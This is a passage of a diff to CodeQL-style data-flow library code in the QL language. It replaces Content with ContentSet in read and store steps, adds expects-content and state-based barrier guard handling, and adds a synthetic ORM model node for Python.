not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -94,15 +94,19 @@ abstract class Configuration extends string {
predicate isBarrierGuard(BarrierGuard guard) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis.
* Holds if data flow through nodes guarded by `guard` is prohibited when
* the flow state is `state`
*/
predicate isBarrierGuard(BarrierGuard guard, FlowState state) { none() }
/**
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
*/
predicate isAdditionalFlowStep(Node node1, Node node2) { none() }
/**
* Holds if the additional flow step from `node1` to `node2` must be taken
* into account in the analysis. This step is only applicable in `state1` and
* updates the flow state to `state2`.
* Holds if data may flow from `node1` to `node2` in addition to the normal data-flow steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalFlowStep(Node node1, FlowState state1, Node node2, FlowState state2) {
none()
@@ -112,7 +116,7 @@ abstract class Configuration extends string {
* Holds if an arbitrary number of implicit read steps of content `c` may be
* taken at `node`.
*/
predicate allowImplicitRead(Node node, Content c) { none() }
predicate allowImplicitRead(Node node, ContentSet c) { none() }
/**
* Gets the virtual dispatch branching limit when calculating field flow.
@@ -166,6 +170,14 @@ abstract class Configuration extends string {
*/
int explorationLimit() { none() }
/**
* Holds if hidden nodes should be included in the data flow graph.
*
* This feature should only be used for debugging or when the data flow graph
* is not visualized (for example in a `path-problem` query).
*/
predicate includeHiddenNodes() { none() }
/**
* Holds if there is a partial data flow path from `source` to `node`. The
* approximate distance between `node` and the closest source is `dist` and
@@ -345,9 +357,13 @@ private predicate fullBarrier(NodeEx node, Configuration config) {
pragma[nomagic]
private predicate stateBarrier(NodeEx node, FlowState state, Configuration config) {
exists(Node n |
node.asNode() = n and
exists(Node n | node.asNode() = n |
config.isBarrier(n, state)
or
exists(BarrierGuard g |
config.isBarrierGuard(g, state) and
n = g.getAGuardedNode()
)
)
}
@@ -477,8 +493,9 @@ private predicate additionalJumpStateStep(
)
}
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
read(node1.asNode(), c, node2.asNode()) and
pragma[nomagic]
private predicate readSet(NodeEx node1, ContentSet c, NodeEx node2, Configuration config) {
readSet(node1.asNode(), c, node2.asNode()) and
stepFilter(node1, node2, config)
or
exists(Node n |
@@ -488,6 +505,37 @@ private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration conf
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate read(NodeEx node1, Content c, NodeEx node2, Configuration config) {
exists(ContentSet cs |
readSet(node1, cs, node2, config) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate clearsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
clearsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
// inline to reduce fan-out via `getAReadContent`
bindingset[c]
private predicate expectsContentEx(NodeEx n, Content c) {
exists(ContentSet cs |
expectsContentCached(n.asNode(), cs) and
pragma[only_bind_out](c) = pragma[only_bind_into](cs).getAReadContent()
)
}
pragma[nomagic]
private predicate notExpectsContent(NodeEx n) { not expectsContentCached(n.asNode(), _) }
pragma[nomagic]
private predicate store(
NodeEx node1, TypedContent tc, NodeEx node2, DataFlowType contentType, Configuration config
) {
@@ -565,9 +613,9 @@ private module Stage1 {
)
or
// read
exists(Content c |
fwdFlowRead(c, node, cc, config) and
fwdFlowConsCand(c, config)
exists(ContentSet c |
fwdFlowReadSet(c, node, cc, config) and
fwdFlowConsCandSet(c, _, config)
)
or
// flow into a callable
@@ -591,10 +639,10 @@ private module Stage1 {
private predicate fwdFlow(NodeEx node, Configuration config) { fwdFlow(node, _, config) }
pragma[nomagic]
private predicate fwdFlowRead(Content c, NodeEx node, Cc cc, Configuration config) {
private predicate fwdFlowReadSet(ContentSet c, NodeEx node, Cc cc, Configuration config) {
exists(NodeEx mid |
fwdFlow(mid, cc, config) and
read(mid, c, node, config)
readSet(mid, c, node, config)
)
}
@@ -612,6 +660,16 @@ private module Stage1 {
)
}
/**
* Holds if `cs` may be interpreted in a read as the target of some store
* into `c`, in the flow covered by `fwdFlow`.
*/
pragma[nomagic]
private predicate fwdFlowConsCandSet(ContentSet cs, Content c, Configuration config) {
fwdFlowConsCand(c, config) and
c = cs.getAReadContent()
}
pragma[nomagic]
private predicate fwdFlowReturnPosition(ReturnPosition pos, Cc cc, Configuration config) {
exists(RetNodeEx ret |
@@ -704,9 +762,9 @@ private module Stage1 {
)
or
// read
exists(NodeEx mid, Content c |
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
exists(NodeEx mid, ContentSet c |
readSet(node, c, mid, config) and
fwdFlowConsCandSet(c, _, pragma[only_bind_into](config)) and
revFlow(mid, toReturn, pragma[only_bind_into](config))
)
or
@@ -732,10 +790,10 @@ private module Stage1 {
*/
pragma[nomagic]
private predicate revFlowConsCand(Content c, Configuration config) {
exists(NodeEx mid, NodeEx node |
exists(NodeEx mid, NodeEx node, ContentSet cs |
fwdFlow(node, pragma[only_bind_into](config)) and
read(node, c, mid, config) and
fwdFlowConsCand(c, pragma[only_bind_into](config)) and
readSet(node, cs, mid, config) and
fwdFlowConsCandSet(cs, c, pragma[only_bind_into](config)) and
revFlow(pragma[only_bind_into](mid), _, pragma[only_bind_into](config))
)
}
@@ -754,7 +812,8 @@ private module Stage1 {
* Holds if `c` is the target of both a read and a store in the flow covered
* by `revFlow`.
*/
private predicate revFlowIsReadAndStored(Content c, Configuration conf) {
pragma[nomagic]
predicate revFlowIsReadAndStored(Content c, Configuration conf) {
revFlowConsCand(c, conf) and
revFlowStore(c, _, _, conf)
}
@@ -853,8 +912,8 @@ private module Stage1 {
pragma[nomagic]
predicate readStepCand(NodeEx n1, Content c, NodeEx n2, Configuration config) {
revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config)) and
read(n1, c, n2, pragma[only_bind_into](config))
read(n1, c, n2, pragma[only_bind_into](config)) and
revFlow(n2, pragma[only_bind_into](config))
}
pragma[nomagic]
@@ -864,7 +923,10 @@ private module Stage1 {
predicate revFlow(
NodeEx node, FlowState state, boolean toReturn, ApOption returnAp, Ap ap, Configuration config
) {
revFlow(node, toReturn, config) and exists(state) and exists(returnAp) and exists(ap)
revFlow(node, toReturn, pragma[only_bind_into](config)) and
exists(state) and
exists(returnAp) and
exists(ap)
}
private predicate throughFlowNodeCand(NodeEx node, Configuration config) {
@@ -1110,8 +1172,8 @@ private module Stage2 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
bindingset[node1, state1, config]
bindingset[node2, state2, config]
@@ -1139,11 +1201,26 @@ private module Stage2 {
private predicate flowIntoCall = flowIntoCallNodeCand1/5;
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::revFlowIsReadAndStored(c, pragma[only_bind_into](config)) and
expectsContentEx(node, c)
)
}
bindingset[node, state, ap, config]
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
PrevStage::revFlowState(state, config) and
PrevStage::revFlowState(state, pragma[only_bind_into](config)) and
exists(ap) and
not stateBarrier(node, state, config)
not stateBarrier(node, state, config) and
(
notExpectsContent(node)
or
ap = true and
expectsContentCand(node, config)
)
}
bindingset[ap, contentType]
@@ -1198,7 +1275,7 @@ private module Stage2 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -1566,7 +1643,7 @@ private module Stage2 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -1604,10 +1681,24 @@ private module Stage2 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -1698,7 +1789,8 @@ private module LocalFlowBigStep {
private class FlowCheckNode extends NodeEx {
FlowCheckNode() {
castNode(this.asNode()) or
clearsContentCached(this.asNode(), _)
clearsContentCached(this.asNode(), _) or
expectsContentCached(this.asNode(), _)
}
}
@@ -1706,18 +1798,31 @@ private module LocalFlowBigStep {
* Holds if `node` can be the first node in a maximal subsequence of local
* flow steps in a dataflow path.
*/
predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
private predicate localFlowEntry(NodeEx node, FlowState state, Configuration config) {
Stage2::revFlow(node, state, config) and
(
sourceNode(node, state, config) or
jumpStep(_, node, config) or
additionalJumpStep(_, node, config) or
additionalJumpStateStep(_, _, node, state, config) or
node instanceof ParamNodeEx or
node.asNode() instanceof OutNodeExt or
store(_, _, node, _, config) or
read(_, _, node, config) or
sourceNode(node, state, config)
or
jumpStep(_, node, config)
or
additionalJumpStep(_, node, config)
or
additionalJumpStateStep(_, _, node, state, config)
or
node instanceof ParamNodeEx
or
node.asNode() instanceof OutNodeExt
or
Stage2::storeStepCand(_, _, _, node, _, config)
or
Stage2::readStepCand(_, _, node, config)
or
node instanceof FlowCheckNode
or
exists(FlowState s |
additionalLocalStateStep(_, s, node, state, config) and
s != state
)
)
}
@@ -1731,12 +1836,15 @@ private module LocalFlowBigStep {
additionalJumpStep(node, next, config) or
flowIntoCallNodeCand1(_, node, next, config) or
flowOutOfCallNodeCand1(_, node, next, config) or
store(node, _, next, _, config) or
read(node, _, next, config)
Stage2::storeStepCand(node, _, _, next, _, config) or
Stage2::readStepCand(node, _, next, config)
)
or
exists(NodeEx next, FlowState s | Stage2::revFlow(next, s, config) |
additionalJumpStateStep(node, state, next, s, config)
or
additionalLocalStateStep(node, state, next, s, config) and
s != state
)
or
Stage2::revFlow(node, state, config) and
@@ -1770,42 +1878,40 @@ private module LocalFlowBigStep {
*/
pragma[nomagic]
private predicate localFlowStepPlus(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
DataFlowType t, Configuration config, LocalCallContext cc
NodeEx node1, FlowState state, NodeEx node2, boolean preservesValue, DataFlowType t,
Configuration config, LocalCallContext cc
) {
not isUnreachableInCallCached(node2.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
(
localFlowEntry(node1, pragma[only_bind_into](state1), pragma[only_bind_into](config)) and
localFlowEntry(node1, pragma[only_bind_into](state), pragma[only_bind_into](config)) and
(
localFlowStepNodeCand1(node1, node2, config) and
state1 = state2 and
preservesValue = true and
t = node1.getDataFlowType() // irrelevant dummy value
t = node1.getDataFlowType() and // irrelevant dummy value
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
additionalLocalFlowStepNodeCand2(node1, state, node2, state, config) and
preservesValue = false and
t = node2.getDataFlowType()
) and
node1 != node2 and
cc.relevantFor(node1.getEnclosingCallable()) and
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall()) and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
not isUnreachableInCallCached(node1.asNode(), cc.(LocalCallContextSpecificCall).getCall())
or
exists(NodeEx mid |
localFlowStepPlus(node1, state1, mid, pragma[only_bind_into](state2), preservesValue, t,
localFlowStepPlus(node1, pragma[only_bind_into](state), mid, preservesValue, t,
pragma[only_bind_into](config), cc) and
localFlowStepNodeCand1(mid, node2, config) and
not mid instanceof FlowCheckNode and
Stage2::revFlow(node2, pragma[only_bind_into](state2), pragma[only_bind_into](config))
Stage2::revFlow(node2, pragma[only_bind_into](state), pragma[only_bind_into](config))
)
or
exists(NodeEx mid, FlowState st |
localFlowStepPlus(node1, state1, mid, st, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, st, node2, state2, config) and
exists(NodeEx mid |
localFlowStepPlus(node1, state, mid, _, _, pragma[only_bind_into](config), cc) and
additionalLocalFlowStepNodeCand2(mid, state, node2, state, config) and
not mid instanceof FlowCheckNode and
preservesValue = false and
t = node2.getDataFlowType() and
Stage2::revFlow(node2, state2, pragma[only_bind_into](config))
t = node2.getDataFlowType()
)
)
}
@@ -1819,9 +1925,19 @@ private module LocalFlowBigStep {
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
AccessPathFrontNil apf, Configuration config, LocalCallContext callContext
) {
localFlowStepPlus(node1, state1, node2, state2, preservesValue, apf.getType(), config,
callContext) and
localFlowExit(node2, state2, config)
localFlowStepPlus(node1, state1, node2, preservesValue, apf.getType(), config, callContext) and
localFlowExit(node2, state1, config) and
state1 = state2
or
additionalLocalFlowStepNodeCand2(node1, state1, node2, state2, config) and
state1 != state2 and
preservesValue = false and
apf = TFrontNil(node2.getDataFlowType()) and
callContext.relevantFor(node1.getEnclosingCallable()) and
not exists(DataFlowCall call | call = callContext.(LocalCallContextSpecificCall).getCall() |
isUnreachableInCallCached(node1.asNode(), call) or
isUnreachableInCallCached(node2.asNode(), call)
)
}
}
@@ -1879,8 +1995,8 @@ private module Stage3 {
bindingset[call, c, innercc]
private CcNoCall getCallContextReturn(DataFlowCallable c, DataFlowCall call, Cc innercc) { any() }
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) { any() }
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) { any() }
private predicate localStep(
NodeEx node1, FlowState state1, NodeEx node2, FlowState state2, boolean preservesValue,
@@ -1894,7 +2010,34 @@ private module Stage3 {
private predicate flowIntoCall = flowIntoCallNodeCand2/5;
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap) { ap.isClearedAt(node.asNode()) }
private predicate clearSet(NodeEx node, ContentSet c, Configuration config) {
PrevStage::revFlow(node, config) and
clearsContentCached(node.asNode(), c)
}
pragma[nomagic]
private predicate clearContent(NodeEx node, Content c, Configuration config) {
exists(ContentSet cs |
PrevStage::readStepCand(_, pragma[only_bind_into](c), _, pragma[only_bind_into](config)) and
c = cs.getAReadContent() and
clearSet(node, cs, pragma[only_bind_into](config))
)
}
pragma[nomagic]
private predicate clear(NodeEx node, Ap ap, Configuration config) {
clearContent(node, ap.getHead().getContent(), config)
}
pragma[nomagic]
private predicate expectsContentCand(NodeEx node, Ap ap, Configuration config) {
exists(Content c |
PrevStage::revFlow(node, pragma[only_bind_into](config)) and
PrevStage::readStepCand(_, c, _, pragma[only_bind_into](config)) and
expectsContentEx(node, c) and
c = ap.getHead().getContent()
)
}
pragma[nomagic]
private predicate castingNodeEx(NodeEx node) { node.asNode() instanceof CastingNode }
@@ -1903,8 +2046,13 @@ private module Stage3 {
private predicate filter(NodeEx node, FlowState state, Ap ap, Configuration config) {
exists(state) and
exists(config) and
not clear(node, ap) and
if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()
not clear(node, ap, config) and
(if castingNodeEx(node) then compatibleTypes(node.getDataFlowType(), ap.getType()) else any()) and
(
notExpectsContent(node)
or
expectsContentCand(node, ap, config)
)
}
bindingset[ap, contentType]
@@ -1963,7 +2111,7 @@ private module Stage3 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -2331,7 +2479,7 @@ private module Stage3 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -2369,10 +2517,24 @@ private module Stage3 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -2693,9 +2855,8 @@ private module Stage4 {
if reducedViableImplInReturn(c, call) then result = TReturn(c, call) else result = ccNone()
}
bindingset[node, cc, config]
private LocalCc getLocalCc(NodeEx node, Cc cc, Configuration config) {
localFlowEntry(node, _, config) and
bindingset[node, cc]
private LocalCc getLocalCc(NodeEx node, Cc cc) {
result =
getLocalCallContext(pragma[only_bind_into](pragma[only_bind_out](cc)),
node.getEnclosingCallable())
@@ -2791,7 +2952,7 @@ private module Stage4 {
or
exists(NodeEx mid, FlowState state0, Ap ap0, LocalCc localCc |
fwdFlow(mid, state0, cc, argAp, ap0, config) and
localCc = getLocalCc(mid, cc, config)
localCc = getLocalCc(mid, cc)
|
localStep(mid, state0, node, state, true, _, config, localCc) and
ap = ap0
@@ -3159,7 +3320,7 @@ private module Stage4 {
Configuration config
) {
exists(Ap ap2, Content c |
store(node1, tc, node2, contentType, config) and
PrevStage::storeStepCand(node1, _, tc, node2, contentType, config) and
revFlowStore(ap2, c, ap1, node1, _, tc, node2, _, _, config) and
revFlowConsCand(ap2, c, ap1, config)
)
@@ -3197,10 +3358,24 @@ private module Stage4 {
storeStepFwd(_, ap, tc, _, _, config)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
private predicate revConsCand(TypedContent tc, Ap ap, Configuration config) {
storeStepCand(_, ap, tc, _, _, config)
}
private predicate validAp(Ap ap, Configuration config) {
revFlow(_, _, _, _, ap, config) and ap instanceof ApNil
or
exists(TypedContent head, Ap tail |
consCand(head, tail, config) and
ap = apCons(head, tail)
)
}
predicate consCand(TypedContent tc, Ap ap, Configuration config) {
revConsCand(tc, ap, config) and
validAp(ap, config)
}
pragma[noinline]
private predicate parameterFlow(
ParamNodeEx p, Ap ap, Ap ap0, DataFlowCallable c, Configuration config
@@ -3269,17 +3444,28 @@ private Configuration unbindConf(Configuration conf) {
exists(Configuration c | result = pragma[only_bind_into](c) and conf = pragma[only_bind_into](c))
}
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
pragma[nomagic]
private predicate nodeMayUseSummary0(
NodeEx n, DataFlowCallable c, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c, AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, apa, _) and
exists(AccessPathApprox apa0 |
Stage4::parameterMayFlowThrough(_, c, _, _) and
Stage4::revFlow(n, state, true, _, apa0, config) and
Stage4::fwdFlow(n, state, any(CallContextCall ccc), TAccessPathApproxSome(apa), apa0, config) and
n.getEnclosingCallable() = c
)
}
pragma[nomagic]
private predicate nodeMayUseSummary(
NodeEx n, FlowState state, AccessPathApprox apa, Configuration config
) {
exists(DataFlowCallable c |
Stage4::parameterMayFlowThrough(_, c, apa, config) and
nodeMayUseSummary0(n, c, state, apa, config)
)
}
private newtype TSummaryCtx =
TSummaryCtxNone() or
TSummaryCtxSome(ParamNodeEx p, FlowState state, AccessPath ap) {
@@ -3475,7 +3661,7 @@ private newtype TPathNode =
* of dereference operations needed to get from the value in the node to the
* tracked object. The final type indicates the type of the tracked object.
*/
abstract private class AccessPath extends TAccessPath {
private class AccessPath extends TAccessPath {
/** Gets the head of this access path, if any. */
abstract TypedContent getHead();
@@ -3690,11 +3876,14 @@ abstract private class PathNodeImpl extends PathNode {
abstract NodeEx getNodeEx();
predicate isHidden() {
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
not this.getConfiguration().includeHiddenNodes() and
(
hiddenNode(this.getNodeEx().asNode()) and
not this.isSource() and
not this instanceof PathNodeSink
or
this.getNodeEx() instanceof TNodeImplicitRead
)
}
private string ppAp() {
@@ -4171,10 +4360,16 @@ private module Subpaths {
exists(NodeEx n1, NodeEx n2 | n1 = n.getNodeEx() and n2 = result.getNodeEx() |
localFlowBigStep(n1, _, n2, _, _, _, _, _) or
store(n1, _, n2, _, _) or
read(n1, _, n2, _)
readSet(n1, _, n2, _)
)
}
pragma[nomagic]
private predicate hasSuccessor(PathNode pred, PathNodeMid succ, NodeEx succNode) {
succ = pred.getASuccessor() and
succNode = succ.getNodeEx()
}
/**
* Holds if `(arg, par, ret, out)` forms a subpath-tuple, that is, flow through
* a subpath between `par` and `ret` with the connecting edges `arg -> par` and
@@ -4182,15 +4377,13 @@ private module Subpaths {
*/
predicate subpaths(PathNode arg, PathNodeImpl par, PathNodeImpl ret, PathNode out) {
exists(ParamNodeEx p, NodeEx o, FlowState sout, AccessPath apout, PathNodeMid out0 |
pragma[only_bind_into](arg).getASuccessor() = par and
pragma[only_bind_into](arg).getASuccessor() = out0 and
subpaths03(arg, p, localStepToHidden*(ret), o, sout, apout) and
pragma[only_bind_into](arg).getASuccessor() = pragma[only_bind_into](out0) and
subpaths03(pragma[only_bind_into](arg), p, localStepToHidden*(ret), o, sout, apout) and
hasSuccessor(pragma[only_bind_into](arg), par, p) and
not ret.isHidden() and
par.getNodeEx() = p and
out0.getNodeEx() = o and
out0.getState() = sout and
out0.getAp() = apout and
(out = out0 or out = out0.projectToSink())
pathNode(out0, o, sout, _, _, apout, _, _)
|
out = out0 or out = out0.projectToSink()
)
}
@@ -4526,7 +4719,11 @@ private module FlowExploration {
or
exists(PartialPathNodeRev mid |
revPartialPathStep(mid, node, state, sc1, sc2, sc3, ap, config) and
not clearsContentCached(node.asNode(), ap.getHead()) and
not clearsContentEx(node, ap.getHead()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead())
) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
distSink(node.getEnclosingCallable(), config) <= config.explorationLimit()
@@ -4542,7 +4739,11 @@ private module FlowExploration {
partialPathStep(mid, node, state, cc, sc1, sc2, sc3, ap, config) and
not fullBarrier(node, config) and
not stateBarrier(node, state, config) and
not clearsContentCached(node.asNode(), ap.getHead().getContent()) and
not clearsContentEx(node, ap.getHead().getContent()) and
(
notExpectsContent(node) or
expectsContentEx(node, ap.getHead().getContent())
) and
if node.asNode() instanceof CastingNode
then compatibleTypes(node.getDataFlowType(), ap.getType())
else any()
@@ -4976,6 +5177,7 @@ private module FlowExploration {
)
}
pragma[nomagic]
private predicate revPartialPathStep(
PartialPathNodeRev mid, NodeEx node, FlowState state, TRevSummaryCtx1 sc1, TRevSummaryCtx2 sc2,
TRevSummaryCtx3 sc3, RevPartialAccessPath ap, Configuration config

View File

@@ -216,10 +216,9 @@ private module LambdaFlow {
or
// jump step
exists(Node mid, DataFlowType t0 |
revLambdaFlow(lambdaCall, kind, mid, t0, _, _, _) and
revLambdaFlow(lambdaCall, kind, mid, t0, _, _, lastCall) and
toReturn = false and
toJump = true and
lastCall = TDataFlowCallNone()
toJump = true
|
jumpStepCached(node, mid) and
t = t0
@@ -305,7 +304,7 @@ cached
private module Cached {
/**
* If needed, call this predicate from `DataFlowImplSpecific.qll` in order to
* force a stage-dependency on the `DataFlowImplCommon.qll` stage and therby
* force a stage-dependency on the `DataFlowImplCommon.qll` stage and thereby
* collapsing the two stages.
*/
cached
@@ -326,7 +325,10 @@ private module Cached {
predicate jumpStepCached(Node node1, Node node2) { jumpStep(node1, node2) }
cached
predicate clearsContentCached(Node n, Content c) { clearsContent(n, c) }
predicate clearsContentCached(Node n, ContentSet c) { clearsContent(n, c) }
cached
predicate expectsContentCached(Node n, ContentSet c) { expectsContent(n, c) }
cached
predicate isUnreachableInCallCached(Node n, DataFlowCall call) { isUnreachableInCall(n, call) }
@@ -373,7 +375,7 @@ private module Cached {
// For reads, `x.f`, we want to check that the tracked type after the read (which
// is obtained by popping the head of the access path stack) is compatible with
// the type of `x.f`.
read(_, _, n)
readSet(_, _, n)
}
cached
@@ -469,7 +471,7 @@ private module Cached {
// read
exists(Node mid |
parameterValueFlowCand(p, mid, false) and
read(mid, _, node) and
readSet(mid, _, node) and
read = true
)
or
@@ -657,8 +659,10 @@ private module Cached {
* Holds if `arg` flows to `out` through a call using only
* value-preserving steps and a single read step, not taking call
* contexts into account, thus representing a getter-step.
*
* This predicate is exposed for testing only.
*/
predicate getterStep(ArgNode arg, Content c, Node out) {
predicate getterStep(ArgNode arg, ContentSet c, Node out) {
argumentValueFlowsThrough(arg, TReadStepTypesSome(_, c, _), out)
}
@@ -781,8 +785,12 @@ private module Cached {
parameterValueFlow(p, n.getPreUpdateNode(), TReadStepTypesNone())
}
private predicate store(
Node node1, Content c, Node node2, DataFlowType contentType, DataFlowType containerType
cached
predicate readSet(Node node1, ContentSet c, Node node2) { readStep(node1, c, node2) }
cached
predicate storeSet(
Node node1, ContentSet c, Node node2, DataFlowType contentType, DataFlowType containerType
) {
storeStep(node1, c, node2) and
contentType = getNodeDataFlowType(node1) and
@@ -794,14 +802,19 @@ private module Cached {
|
argumentValueFlowsThrough(n2, TReadStepTypesSome(containerType, c, contentType), n1)
or
read(n2, c, n1) and
readSet(n2, c, n1) and
contentType = getNodeDataFlowType(n1) and
containerType = getNodeDataFlowType(n2)
)
}
cached
predicate read(Node node1, Content c, Node node2) { readStep(node1, c, node2) }
private predicate store(
Node node1, Content c, Node node2, DataFlowType contentType, DataFlowType containerType
) {
exists(ContentSet cs |
c = cs.getAStoreContent() and storeSet(node1, cs, node2, contentType, containerType)
)
}
/**
* Holds if data can flow from `node1` to `node2` via a direct assignment to
@@ -932,16 +945,16 @@ class CastingNode extends Node {
}
private predicate readStepWithTypes(
Node n1, DataFlowType container, Content c, Node n2, DataFlowType content
Node n1, DataFlowType container, ContentSet c, Node n2, DataFlowType content
) {
read(n1, c, n2) and
readSet(n1, c, n2) and
container = getNodeDataFlowType(n1) and
content = getNodeDataFlowType(n2)
}
private newtype TReadStepTypesOption =
TReadStepTypesNone() or
TReadStepTypesSome(DataFlowType container, Content c, DataFlowType content) {
TReadStepTypesSome(DataFlowType container, ContentSet c, DataFlowType content) {
readStepWithTypes(_, container, c, _, content)
}
@@ -950,7 +963,7 @@ private class ReadStepTypesOption extends TReadStepTypesOption {
DataFlowType getContainerType() { this = TReadStepTypesSome(result, _, _) }
Content getContent() { this = TReadStepTypesSome(_, result, _) }
ContentSet getContent() { this = TReadStepTypesSome(_, result, _) }
DataFlowType getContentType() { this = TReadStepTypesSome(_, _, result) }
@@ -1325,8 +1338,6 @@ abstract class AccessPathFront extends TAccessPathFront {
abstract boolean toBoolNonEmpty();
TypedContent getHead() { this = TFrontHead(result) }
predicate isClearedAt(Node n) { clearsContentCached(n, this.getHead().getContent()) }
}
class AccessPathFrontNil extends AccessPathFront, TFrontNil {

View File

@@ -1,9 +1,15 @@
/**
* Provides Python-specific definitions for use in the data flow library.
*/
// we need to export `Unit` for the DataFlowImpl* files
private import python as Python
module Private {
import DataFlowPrivate
// import DataFlowDispatch
class Unit = Python::Unit;
}
module Public {

View File

@@ -87,7 +87,20 @@ newtype TNode =
/**
* A synthetic node representing element content in a star pattern.
*/
TStarPatternElementNode(MatchStarPattern target)
TStarPatternElementNode(MatchStarPattern target) or
/**
* INTERNAL: Do not use.
*
* A synthetic node representing the data for an ORM model saved in a DB.
*/
// TODO: Limiting the classes here to the ones that are actually ORM models was
// non-trivial, since that logic is based on API::Node results, and trying to do this
// causes non-monotonic recursion, and makes the API graph evaluation recursive with
// data-flow, which might do bad things for performance.
//
// So for now we live with having these synthetic ORM nodes for _all_ classes, which
// is a bit wasteful, but we don't think it will hurt too much.
TSyntheticOrmModelNode(Class cls)
/** Helper for `Node::getEnclosingCallable`. */
private DataFlowCallable getCallableScope(Scope s) {
@@ -97,13 +110,19 @@ private DataFlowCallable getCallableScope(Scope s) {
result = getCallableScope(s.getEnclosingScope())
}
private import semmle.python.internal.CachedStages
/**
